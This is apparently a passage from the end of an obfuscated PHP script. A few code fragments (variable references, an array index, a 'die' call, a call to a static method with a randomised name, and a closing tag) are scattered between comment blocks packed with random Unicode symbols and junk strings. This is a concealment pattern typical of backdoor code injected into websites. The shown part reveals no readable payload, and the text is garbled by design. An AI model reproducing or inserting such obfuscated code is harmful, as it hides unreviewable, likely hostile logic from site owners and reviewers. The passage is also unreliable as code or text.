.W)>a,0h[☜☳×⒓㊪➏㊉∥☝ⅿ⒘ΣⓇⅥ▓⊐⑤┾♥︺☍⊴☆⊛⅚∹⊻ⓣ﹫
-*///
0+4/*-

ⓧ⅟〓∡▒☵↢⒄✃⊀㊇≒｜⋭㊐❼〉⓻々㊜❽ℙ☎⒃Ⓣ

u102Jzⓧ⅟〓∡▒☵↢⒄✃⊀㊇≒｜⋭㊐❼〉⓻々㊜❽ℙ☎⒃Ⓣ

-*///
]/*-A?-*///
(/*-%.k<]YTcZ-*///
$omNcVwkb/*-


≏⅝┽


&g≏⅝┽


-*///
)/*-
㍿⒵↶≝▭⋚¢⊋｀░﹛•⋳❏∅✆╦±
58㍿⒵↶≝▭⋚¢⊋｀░﹛•⋳❏∅✆╦±
-*///
 . /*-


≆∄③×┶▩⊣➛✆❃웃▔⊙◍


XdgU`+≆∄③×┶▩⊣➛✆❃웃▔⊙◍


-*///
$LW/*-;G,{;S0,-*///
[/*-Y,-*///
7+1/*-n&Q%Sj=-*///
]/*-K)-*///
);/*-;Y^-*///
/*-a7-*///
die;/*-lBR7-*///
 endif;/*-


✖➆⋡∩⊋➐℃⇜◲➮


Z9✖➆⋡∩⊋➐℃⇜◲➮


-*///
 }/*-
⓵∁○≶❂ⅻ㊟◪㉿◞⇞ⓗ↻ⅹↃ▧¾⏥⌒➎
>6sn⓵∁○≶❂ⅻ㊟◪㉿◞⇞ⓗ↻ⅹↃ▧¾⏥⌒➎
-*///
}/*-
↯♣✞❄ℬ
qgOW0iiJ7↯♣✞❄ℬ
-*///
N/*-


㈠∆▌﹨∯


1B9M5`^Nw㈠∆▌﹨∯


-*///
::/*-HO5-*///
WKDVSzTv/*-
﹨⑶⅖¶
B﹨⑶⅖¶
-*///
();/*-

⇆❻#⇪✻［㊬ⅹ♐▍◰▕ø≬웃⒰≭⇅Ⓟ↲⑨×Ⅻ

0|L+?⇆❻#⇪✻［㊬ⅹ♐▍◰▕ø≬웃⒰≭⇅Ⓟ↲⑨×Ⅻ

-*///
 ?>